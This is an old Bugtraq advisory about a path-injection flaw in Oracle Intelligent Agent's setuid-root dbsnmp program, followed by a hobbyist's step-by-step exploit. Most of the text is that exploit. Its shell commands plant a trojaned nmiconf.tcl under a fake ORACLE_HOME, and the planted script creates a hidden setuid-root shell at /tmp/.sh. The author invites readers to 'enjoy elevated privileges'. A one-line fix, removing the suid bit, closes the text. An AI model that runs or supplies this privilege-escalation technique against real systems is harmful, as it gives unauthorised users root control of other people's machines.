START OF BUGTRAQ POST

Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp program located
in $ORACLE_HOME/bin . This setuid root program calls a tcl script 
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The
problem is that the dbsnmp script relies on an environment variable (the
path to nmiconf.tcl) which can be a set by a user. Therefore, intruders
can force the script to execute a trojaned version of nmiconf.tcl which
will run as root.

END OF BUGTRAQ POST


apparently, as we see from above, $ORACLE_HOME would need to be reset for
this exploit to work properly. so lets do it.

first of all, drop to a bourne or korn shell and do the following:
-------

echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345
mkdir -p /tmp/whatever/network/agent/config
export $ORACLE_HOME=/tmp/whatever
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF

# or even an exec call instead of system... whatever...

cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF

-------
mileage may vary widely with your OS and tcl version, 
so this is merely a template of the process involved...
however all one needs to do to make this a reality 
is run the OLD dbsnmp program and you will spawn a
root shell in /tmp called /tmp/.sh
execute the root shell and enjoy elevated privileges.

NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable. 
theres no reason to have it set in the first place as root should 
be the only user really to allow an SNMP paradigm to run anyways. 
                              duh


" ...it takes a good man to beat me... it just doesnt take very long."

.|.. ..|.
mujahadin

no extra charge for typos